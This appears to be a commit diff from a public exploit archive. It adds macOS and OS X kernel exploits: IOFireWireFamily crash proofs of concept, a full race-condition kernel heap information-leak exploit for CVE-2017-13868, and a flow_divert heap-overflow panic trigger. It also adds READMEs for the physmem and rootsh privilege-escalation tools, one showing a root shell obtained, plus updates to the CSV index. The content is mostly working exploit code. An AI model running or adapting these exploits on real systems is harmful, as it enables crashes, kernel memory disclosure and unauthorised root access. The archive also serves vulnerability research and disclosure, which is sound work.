DB: 2018-03-04

6 changes to exploits/shellcodes

Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service
Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service
Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic
Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service

Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader
Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'NamedObj ' Kernel Loader
Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak
Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation
Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation

Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' WebKit 5.01 / 'bpf' Kernel Loader 4.55
Sony Playstation 4 (PS4) 4.55 - 'Jailbreak' 'setAttributeNodeNS' WebKit 5.02 / 'bpf' Kernel Loader 4.55

exploits/macos/dos/44235.c

@@ -0,0 +1,66 @@
+/*
+ * IOFireWireFamily-overflow.c
+ * Brandon Azad
+ *
+ * Buffer overflow reachable from IOFireWireUserClient::localConfigDirectory_Publish.
+ *
+ * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44235.zip
+*/
+
+#include <IOKit/IOKitLib.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+	int ret = 0;
+	io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
+			IOServiceMatching("IOFireWireLocalNode"));
+	if (service == IO_OBJECT_NULL) {
+		ret = 1;
+		goto fail1;
+	}
+	io_connect_t connect;
+	kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
+	IOObjectRelease(service);
+	if (kr != KERN_SUCCESS) {
+		ret = 2;
+		goto fail1;
+	}
+	// localConfigDirectory_Create
+	uint64_t directory = 0;
+	uint32_t output_count = 1;
+	kr = IOConnectCallMethod(connect, 16,
+			NULL, 0, NULL, 0,
+			&directory, &output_count, NULL, NULL);
+	if (kr != KERN_SUCCESS) {
+		ret = 3;
+		goto fail2;
+	}
+	// localConfigDirectory_addEntry_Buffer
+	uint32_t size = 0x100000;
+	void *buffer = malloc(size);
+	memset(buffer, 0xaa, size);
+	uint64_t addEntry_Buffer_args[6] = { directory, 0, (uint64_t)buffer, size, 0, 0 };
+	kr = IOConnectCallMethod(connect, 17,
+			addEntry_Buffer_args,
+			sizeof(addEntry_Buffer_args) / sizeof(*addEntry_Buffer_args),
+			NULL, 0,
+			NULL, NULL, NULL, NULL);
+	free(buffer);
+	if (kr != KERN_SUCCESS) {
+		ret = 4;
+		goto fail2;
+	}
+	// localConfigDirectory_Publish
+	kr = IOConnectCallMethod(connect, 21,
+			&directory, 1, NULL, 0,
+			NULL, NULL, NULL, NULL);
+	if (kr != KERN_SUCCESS) {
+		ret = 5;
+		goto fail2;
+	}
+fail2:
+	IOServiceClose(connect);
+fail1:
+	return ret;
+}

exploits/macos/dos/44236.c

@@ -0,0 +1,51 @@
+/*
+ * IOFireWireFamily-null-deref.c
+ * Brandon Azad
+ *
+ * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop.
+ *
+ * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44236.zip
+*/
+
+
+#include <IOKit/IOKitLib.h>
+
+int main() {
+	int ret = 0;
+	io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
+			IOServiceMatching("IOFireWireLocalNode"));
+	if (service == IO_OBJECT_NULL) {
+		ret = 1;
+		goto fail1;
+	}
+	io_connect_t connect;
+	kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect);
+	IOObjectRelease(service);
+	if (kr != KERN_SUCCESS) {
+		ret = 2;
+		goto fail1;
+	}
+	// isochChannel_Create
+	uint64_t args[3] = { 0, 0x100, 0x100 };
+	uint64_t handle = 0;
+	uint32_t output_count = 1;
+	kr = IOConnectCallMethod(connect, 57,
+			args, sizeof(args) / sizeof(*args), NULL, 0,
+			&handle, &output_count, NULL, NULL);
+	if (kr != KERN_SUCCESS) {
+		ret = 3;
+		goto fail2;
+	}
+	// setAsyncRef_IsochChannelForceStop
+	kr = IOConnectCallMethod(connect, 90,
+			&handle, 1, NULL, 0,
+			NULL, NULL, NULL, NULL);
+	if (kr != KERN_SUCCESS) {
+		ret = 4;
+		goto fail2;
+	}
+fail2:
+	IOServiceClose(connect);
+fail1:
+	return ret;
+}

exploits/macos/local/44234.c

@@ -0,0 +1,447 @@
+/*
+ * ctl_ctloutput-leak.c
+ * Brandon Azad
+ *
+ * CVE-2017-13868
+ *
+ * While looking through the source code of XNU version 4570.1.46, I noticed that the function
+ * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of
+ * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap
+ * allocation to user space. Triggering this information leak requires root privileges.
+ *
+ * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel
+ * control socket. The relevant code does the following:
+ *   (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without
+ *       specifying the M_ZERO flag to zero out the allocated bytes.
+ *   (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data
+ *       buffer just allocated. This copyin is supposed to completely overwrite the allocated data,
+ *       which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is
+ *       not checked, which means it is possible that the copyin has failed, leaving uninitialized
+ *       data in the buffer. The copyin could fail if, for example, the program passed an unmapped
+ *       address to getsockopt().
+ *   (c) The code then calls the real getsockopt() implementation for this kernel control socket.
+ *       This implementation should process the input buffer, possibly modifying it and shortening
+ *       it, and return a result code. However, the implementation is free to assume that the
+ *       supplied buffer has already been initialized (since theoretically it comes from user
+ *       space), and hence several implementations don't modify the buffer at all. The NECP
+ *       function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer
+ *       at all.
+ *   (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()
+ *       calls sooptcopyout() to copy the data buffer back to user space.
+ *
+ * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a
+ * controlled size to be allocated, prevent the contents of that buffer from being initialized, and
+ * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped
+ * address. All we need to do for the copyout to succeed is remap that address between the calls to
+ * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap
+ * data to userspace.
+ *
+ * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the
+ * mean number of attempts to win the race was never more than 600, and the median was never more
+ * than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the
+ * exploit.)
+ *
+ * This program exploits this vulnerability to leak data from a kernel heap buffer of a
+ * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS
+ * High Sierra 10.13 (build 17A365).
+ *
+ * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44234.zip
+ *
+ */
+#if 0
+	if (sopt->sopt_valsize && sopt->sopt_val) {
+		MALLOC(data, void *, sopt->sopt_valsize, M_TEMP,	// (a) data is allocated
+			M_WAITOK);					//     without M_ZERO.
+		if (data == NULL)
+			return (ENOMEM);
+		/*
+		 * 4108337 - copy user data in case the
+		 * kernel control needs it
+		 */
+		error = sooptcopyin(sopt, data,				// (b) sooptcopyin() is
+			sopt->sopt_valsize, sopt->sopt_valsize);	//     called to fill the
+	}								//     buffer; the return
+	len = sopt->sopt_valsize;					//     value is ignored.
+	socket_unlock(so, 0);
+	error = (*kctl->getopt)(kctl->kctlref, kcb->unit,		// (c) The getsockopt()
+			kcb->userdata, sopt->sopt_name,			//     implementation is
+				data, &len);				//     called to process
+	if (data != NULL && len > sopt->sopt_valsize)			//     the buffer.
+		panic_plain("ctl_ctloutput: ctl %s returned "
+			"len (%lu) > sopt_valsize (%lu)\n",
+				kcb->kctl->name, len,
+				sopt->sopt_valsize);
+	socket_lock(so, 0);
+	if (error == 0) {
+		if (data != NULL)
+			error = sooptcopyout(sopt, data, len);		// (d) If (c) succeeded,
+		else							//     then the data buffer
+			sopt->sopt_valsize = len;			//     is copied out to
+	}								//     userspace.
+#endif
+
+#include <errno.h>
+#include <mach/mach.h>
+#include <netinet/in.h>
+#include <pthread.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+#if __x86_64__
+
+// ---- Header files not available on iOS ---------------------------------------------------------
+
+#include <mach/mach_vm.h>
+#include <sys/sys_domain.h>
+#include <sys/kern_control.h>
+
+#else /* __x86_64__ */
+
+// If we're not on x86_64, then we probably don't have access to the above headers. The following
+// definitions are copied directly from the macOS header files.
+
+// ---- Definitions from mach/mach_vm.h -----------------------------------------------------------
+
+extern
+kern_return_t mach_vm_allocate
+(
+	vm_map_t target,
+	mach_vm_address_t *address,
+	mach_vm_size_t size,
+	int flags
+);
+
+extern
+kern_return_t mach_vm_deallocate
+(
+	vm_map_t target,
+	mach_vm_address_t address,
+	mach_vm_size_t size
+);
+
+// ---- Definitions from sys/sys_domain.h ---------------------------------------------------------
+
+#define SYSPROTO_CONTROL	2	/* kernel control protocol */
+
+#define AF_SYS_CONTROL		2	/* corresponding sub address type */
+
+// ---- Definitions from sys/kern_control.h -------------------------------------------------------
+
+#define CTLIOCGINFO     _IOWR('N', 3, struct ctl_info)	/* get id from name */
+
+#define MAX_KCTL_NAME	96
+
+struct ctl_info {
+    u_int32_t	ctl_id;					/* Kernel Controller ID  */
+    char	ctl_name[MAX_KCTL_NAME];		/* Kernel Controller Name (a C string) */
+};
+
+struct sockaddr_ctl {
+    u_char	sc_len;		/* depends on size of bundle ID string */
+    u_char	sc_family;	/* AF_SYSTEM */
+    u_int16_t 	ss_sysaddr;	/* AF_SYS_KERNCONTROL */
+    u_int32_t	sc_id; 		/* Controller unique identifier  */
+    u_int32_t 	sc_unit;	/* Developer private unit number */
+    u_int32_t 	sc_reserved[5];
+};
+
+#endif /* __x86_64__ */
+
+// ---- Definitions from bsd/net/necp.h -----------------------------------------------------------
+
+#define	NECP_CONTROL_NAME "com.apple.net.necp_control"
+
+// ---- Macros ------------------------------------------------------------------------------------
+
+#if DEBUG
+#define DEBUG_TRACE(fmt, ...)	printf(fmt"\n", ##__VA_ARGS__)
+#else
+#define DEBUG_TRACE(fmt, ...)
+#endif
+
+#define ERROR(fmt, ...)		printf("Error: "fmt"\n", ##__VA_ARGS__)
+
+// ---- Kernel heap infoleak ----------------------------------------------------------------------
+
+// A callback block that will be called each time kernel data is leaked. leak_data and leak_size
+// are the kernel data that was leaked and the size of the leak. This function should return true
+// to finish and clean up, false to retry the leak.
+typedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);
+
+// Open the control socket for com.apple.necp. Requires root privileges.
+static bool open_necp_control_socket(int *necp_ctlfd) {
+	int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
+	if (ctlfd < 0) {
+		ERROR("Could not create a system control socket: errno %d", errno);
+		return false;
+	}
+	struct ctl_info ctlinfo = { .ctl_id = 0 };
+	strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));
+	int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);
+	if (err) {
+		close(ctlfd);
+		ERROR("Could not retrieve the control ID number for %s: errno %d",
+				NECP_CONTROL_NAME, errno);
+		return false;
+	}
+	struct sockaddr_ctl addr = {
+		.sc_len     = sizeof(addr),
+		.sc_family  = AF_SYSTEM,
+		.ss_sysaddr = AF_SYS_CONTROL,
+		.sc_id      = ctlinfo.ctl_id, // com.apple.necp
+		.sc_unit    = 0,              // Let the kernel pick the control unit.
+	};
+	err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
+	if (err) {
+		close(ctlfd);
+		ERROR("Could not connect to the NECP control system (ID %d) "
+				"unit %d: errno %d", addr.sc_id, addr.sc_unit, errno);
+		return false;
+	}
+	*necp_ctlfd = ctlfd;
+	return true;
+}
+
+// Allocate a virtual memory region at the address pointed to by map_address. If map_address points
+// to a NULL address, then the allocation is created at an arbitrary address which is stored in
+// map_address on return.
+static bool allocate_map_address(void **map_address, size_t map_size) {
+	mach_vm_address_t address = (mach_vm_address_t) *map_address;
+	bool get_address = (address == 0);
+	int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);
+	kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);
+	if (kr != KERN_SUCCESS) {
+		ERROR("Could not allocate virtual memory: mach_vm_allocate %d: %s",
+				kr, mach_error_string(kr));
+		return false;
+	}
+	if (get_address) {
+		*map_address = (void *)address;
+	}
+	return true;
+}
+
+// Deallocate the mapping created by allocate_map_address.
+static void deallocate_map_address(void *map_address, size_t map_size) {
+	mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);
+}
+
+// Context for the map_address_racer thread.
+struct map_address_racer_context {
+	pthread_t     thread;
+	volatile bool running;
+	volatile bool deallocated;
+	volatile bool do_map;
+	volatile bool restart;
+	bool          success;
+	void *        address;
+	size_t        size;
+};
+
+// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map
+// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or
+// running to false. If the thread encounters an internal error, it sets success to false and
+// exits.
+static void *map_address_racer(void *arg) {
+	struct map_address_racer_context *context = arg;
+	while (context->running) {
+		// Deallocate the address.
+		deallocate_map_address(context->address, context->size);
+		context->deallocated = true;
+		// Wait for do_map to become true.
+		while (!context->do_map) {}
+		context->do_map = false;
+		// Do a little bit of work so that the allocation is more likely to take place at
+		// the right time.
+		close(-1);
+		// Re-allocate the address. If this fails, abort.
+		bool success = allocate_map_address(&context->address, context->size);
+		if (!success) {
+			context->success = false;
+			break;
+		}
+		// Wait while we're still running and not told to restart.
+		while (context->running && !context->restart) {}
+		context->restart = false;
+	};
+	return NULL;
+}
+
+// Start the map_address_racer thread.
+static bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {
+	// Allocate the initial block of memory, fixing the address.
+	context->address = NULL;
+	context->size    = leak_size;
+	if (!allocate_map_address(&context->address, context->size)) {
+		goto fail_0;
+	}
+	// Start the racer thread.
+	context->running     = true;
+	context->deallocated = false;
+	context->do_map      = false;
+	context->restart     = false;
+	context->success     = true;
+	int err = pthread_create(&context->thread, NULL, map_address_racer, context);
+	if (err) {
+		ERROR("Could not create map_address_racer thread: errno %d", err);
+		goto fail_1;
+	}
+	return true;
+fail_1:
+	deallocate_map_address(context->address, context->size);
+fail_0:
+	return false;
+}
+
+// Stop the map_address_racer thread.
+static void stop_map_address_racer(struct map_address_racer_context *context) {
+	// Exit the thread.
+	context->running = false;
+	context->do_map  = true;
+	pthread_join(context->thread, NULL);
+	// Deallocate the memory.
+	deallocate_map_address(context->address, context->size);
+}
+
+// Try the NECP leak once. Returns true if the leak succeeded.
+static bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {
+	socklen_t length = context->size;
+	// Wait for the map to be deallocated.
+	while (!context->deallocated) {};
+	context->deallocated = false;
+	// Signal the racer to do the mapping.
+	context->do_map = true;
+	// Try to trigger the leak.
+	int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);
+	if (err) {
+		DEBUG_TRACE("Did not allocate in time");
+		return false;
+	}
+	// Most of the time we end up here: allocating too early. If the first two words are both
+	// 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.
+	uint64_t *data = context->address;
+	if (data[0] == 0 && data[1] == 0) {
+		return false;
+	}
+	// WOW! It worked!
+	return true;
+}
+
+// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.
+static bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,
+		struct map_address_racer_context *context) {
+	const size_t MAX_TRIES = 10000000;
+	bool has_leaked = false;
+	for (size_t try = 1;; try++) {
+		// Try the leak once.
+		if (try_necp_leak(ctlfd, context)) {
+			DEBUG_TRACE("Triggered the leak after %zu %s!", try,
+					(try == 1 ? "try" : "tries"));
+			try = 0;
+			has_leaked = true;
+			// Give the leak to the callback, and finish if it says we're done.
+			if (kernel_leak_callback(context->address, context->size)) {
+				return true;
+			}
+		}
+		// If we haven't successfully leaked anything after MAX_TRIES attempts, give up.
+		if (!has_leaked && try >= MAX_TRIES) {
+			ERROR("Giving up after %zu unsuccessful leak attempts", try);
+			return false;
+		}
+		// Reset for another try.
+		context->restart = true;
+	}
+}
+
+// Leak kernel heap data repeatedly until the callback function returns true.
+static bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {
+	const size_t MIN_LEAK_SIZE = 16;
+	bool success = false;
+	if (leak_size < MIN_LEAK_SIZE) {
+		ERROR("Target leak size too small; must be at least %zu bytes", MIN_LEAK_SIZE);
+		goto fail_0;
+	}
+	int ctlfd;
+	if (!open_necp_control_socket(&ctlfd)) {
+		goto fail_0;
+	}
+	struct map_address_racer_context context;
+	if (!start_map_address_racer(&context, leak_size)) {
+		goto fail_1;
+	}
+	if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {
+		goto fail_2;
+	}
+	success = true;
+fail_2:
+	stop_map_address_racer(&context);
+fail_1:
+	close(ctlfd);
+fail_0:
+	return success;
+}
+
+// ---- Main --------------------------------------------------------------------------------------
+
+// Dump data to stdout.
+static void dump(const void *data, size_t size) {
+	const uint8_t *p = data;
+	const uint8_t *end = p + size;
+	unsigned off = 0;
+	while (p < end) {
+		printf("%06x:  %02x", off & 0xffffff, *p++);
+		for (unsigned i = 1; i < 16 && p < end; i++) {
+			bool space = (i % 8) == 0;
+			printf(" %s%02x", (space ? " " : ""), *p++);
+		}
+		printf("\n");
+		off += 16;
+	}
+}
+
+int main(int argc, const char *argv[]) {
+	// Parse the arguments.
+	if (argc != 2) {
+		ERROR("Usage: %s <leak-size>", argv[0]);
+		return 1;
+	}
+	char *end;
+	size_t leak_size = strtoul(argv[1], &end, 0);
+	if (*end != 0) {
+		ERROR("Invalid leak size '%s'", argv[1]);
+		return 1;
+	}
+	// Try to leak interesting data from the kernel.
+	const size_t MAX_TRIES = 50000;
+	__block size_t try = 1;
+	__block bool leaked = false;
+	bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {
+		// Try to find an kernel pointer in the leak.
+		const uint64_t *p = leak;
+		for (size_t i = 0; i < size / sizeof(*p); i++) {
+			if (p[i] >> 48 == 0xffff) {
+				dump(leak, size);
+				leaked = true;
+				return true;
+			}
+		}
+#if DEBUG
+		// Show this useless leak anyway.
+		DEBUG_TRACE("Boring leak:");
+		dump(leak, size);
+#endif
+		// If we've maxed out, just bail.
+		if (try >= MAX_TRIES) {
+			ERROR("Could not leak interesting data after %zu attempts", try);
+			return true;
+		}
+		try++;
+		return false;
+	});
+	return (success && leaked ? 0 : 1);
+}

exploits/macos/local/44237.md

@@ -0,0 +1,65 @@
+## physmem
+
+<!-- Brandon Azad -->
+
+physmem is a physical memory inspection tool and local privilege escalation targeting macOS up
+through 10.12.1. It exploits either [CVE-2016-1825] or [CVE-2016-7617] depending on the deployment
+target. These two vulnerabilities are nearly identical, and exploitation can be done exactly the
+same. They were patched in OS X El Capitan [10.11.5] and macOS Sierra [10.12.2], respectively.
+
+[CVE-2016-1825]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1825
+[CVE-2016-7617]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7617
+[10.11.5]: https://support.apple.com/en-us/HT206567
+[10.12.2]: https://support.apple.com/en-us/HT207423
+
+Because these are logic bugs, exploitation is incredibly reliable. I have not yet experienced a
+panic in the tens of thousands of times I've run a program (correctly) exploiting these
+vulnerabilities.
+
+### CVE-2016-1825
+
+CVE-2016-1825 is an issue in IOHIDevice which allows setting arbitrary IOKit registry properties.
+In particular, the privileged property IOUserClientClass can be controlled by an unprivileged
+process. I have not tested platforms before Yosemite, but the vulnerability appears in the source
+code as early as Mac OS X Leopard.
+
+### CVE-2016-7617
+
+CVE-2016-7617 is an almost identical issue in AppleBroadcomBluetoothHostController. This
+vulnerability appears to have been introduced in OS X El Capitan. It was reported by Ian Beer of
+Google's Project Zero (issue [974]) and Radu Motspan.
+
+[974]: https://bugs.chromium.org/p/project-zero/issues/detail?id=974
+
+### Building
+
+Build physmem by specifying your deployment target on the command line:
+
+    $ make MACOSX_DEPLOYMENT_TARGET=10.10.5
+
+### Running
+
+You can read a word of physical memory using the read command:
+
+    $ ./physmem read 0x1000
+    a69a04f2f59625b3
+
+You can write to physical memory using the write command:
+
+    $ ./physmem write 0x1000 0x1122334455667788
+    $ ./physmem read 0x1000
+    1122334455667788
+
+You can exec a root shell using the root command:
+
+    $ ./physmem root
+    sh-3.2# whoami
+    root
+
+### License
+
+The physmem code is released into the public domain. As a courtesy I ask that if you reference or
+use any of this code you attribute it to me.
+
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44237.zip

exploits/osx/dos/44238.c

@@ -0,0 +1,68 @@
+/*
+ * flow_divert-heap-overflow.c
+ * Brandon Azad
+ *
+ * CVE-2016-1827: Kernel heap overflow in the function flow_divert_handle_app_map_create on OS X
+ * and iOS. Exploitation requires root privileges. The vulnerability was patched in OS X El Capitan
+ * 10.11.5 and iOS 9.3.2.
+ *
+ * This proof-of-concept triggers a kernel panic on OS X Yosemite. In El Capitan the length fields
+ * were changed from 64 bits to 32 bits, so the message structure will need to be updated
+ * accordingly. This exploit has not been tested on iOS.
+ * 
+ * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44238.zip
+ */
+
+#include <net/if.h>
+#include <string.h>
+#include <sys/sys_domain.h>
+#include <sys/kern_control.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+int main() {
+	int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
+	if (ctlfd == -1) {
+		return 1;
+	}
+	struct ctl_info info = { .ctl_id = 0 };
+	strncpy(info.ctl_name, "com.apple.flow-divert", sizeof(info.ctl_name));
+	int err = ioctl(ctlfd, CTLIOCGINFO, &info);
+	if (err) {
+		return 2;
+	}
+	struct sockaddr_ctl addr = {
+		.sc_len     = sizeof(addr),
+		.sc_family  = AF_SYSTEM,
+		.ss_sysaddr = AF_SYS_CONTROL,
+	};
+	addr.sc_id = info.ctl_id;
+	addr.sc_unit = 0;
+	err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
+	if (err) {
+		return 3;
+	}
+	struct __attribute__((packed)) {
+		uint8_t  type;
+		uint8_t  pad1[3];
+		uint32_t conn_id;
+		uint8_t  prefix_count_tag;
+		uint64_t prefix_count_length;
+		int      prefix_count;
+		uint8_t  signing_id_tag;
+		uint64_t signing_id_length;
+		uint8_t  signing_id[512 + 4];
+	} message = {
+		.type                = 9,
+		.conn_id             = htonl(0),
+		.prefix_count_tag    = 28,
+		.prefix_count_length = htonl(sizeof(int)),
+		.prefix_count        = -2,
+		.signing_id_tag      = 25,
+		.signing_id_length   = htonl(sizeof(message.signing_id)),
+		.signing_id          = { 0xaa },
+	};
+	write(ctlfd, &message, sizeof(message));
+	close(ctlfd);
+	return 4;
+}

exploits/osx/local/44239.md

@@ -0,0 +1,31 @@
+## rootsh
+
+rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build
+14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in
+XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will
+not work on platforms with SMAP enabled.
+
+[CVE-2016-1758]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1758
+[CVE-2016-1828]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1828
+[10.11.4]: https://support.apple.com/en-us/HT206167
+[10.11.5]: https://support.apple.com/en-us/HT206567
+
+### CVE-2016-1758
+
+CVE-2016-1758 is an information leak caused by copying out uninitialized bytes
+of kernel stack to user space. By comparing leaked kernel pointers with fixed
+reference addresses it is possible to recover the kernel slide.
+
+### CVE-2016-1828
+
+CVE-2016-1828 is a use-after-free during object deserialization. By passing a
+crafted binary-serialized dictionary into the kernel, it is possible to trigger
+a virtual method invocation on an object with a controlled vtable pointer.
+
+### License
+
+The rootsh code is released into the public domain. As a courtesy I ask that if
+you use any of this code in another project you attribute it to me.
+
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44239.zip

files_exploits.csv

@@ -5877,7 +5877,7 @@ id,file,description,date,author,type,platform,port
 44182,exploits/linux/dos/44182.py,"Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
 44183,exploits/linux/dos/44183.py,"Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service",2018-02-27,EnableSecurity,dos,linux,5060
 44184,exploits/linux/dos/44184.py,"Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption",2018-02-27,EnableSecurity,dos,linux,5060
-44189,exploits/windows/dos/44189.py,"Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
+44189,exploits/windows/dos/44189.py,"Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service",2018-02-27,"Nabeel Ahmed",dos,windows,
 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
 44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
@@ -5885,6 +5885,9 @@ id,file,description,date,author,type,platform,port
 44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
 44221,exploits/windows/dos/44221.py,"SEGGER embOS/IP FTP Server 3.22 - Denial of Service",2018-03-02,hyp3rlinx,dos,windows,
 44222,exploits/windows/dos/44222.txt,"DualDesk 20 - 'Proxy.exe' Denial of Service",2018-03-02,hyp3rlinx,dos,windows,
+44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos,
+44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx,
+44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9337,7 +9340,7 @@ id,file,description,date,author,type,platform,port
 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux,
 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows,
 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
-43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'namedobj ' Kernel Loader",2017-12-27,Specter,local,hardware,
+43397,exploits/hardware/local/43397.md,"Sony Playstation 4 (PS4) 4.05 - 'Jailbreak' WebKit / 'NamedObj ' Kernel Loader",2017-12-27,Specter,local,hardware,
 43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
 43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
 43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
@@ -9560,6 +9563,9 @@ id,file,description,date,author,type,platform,port
 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
 38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
+44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
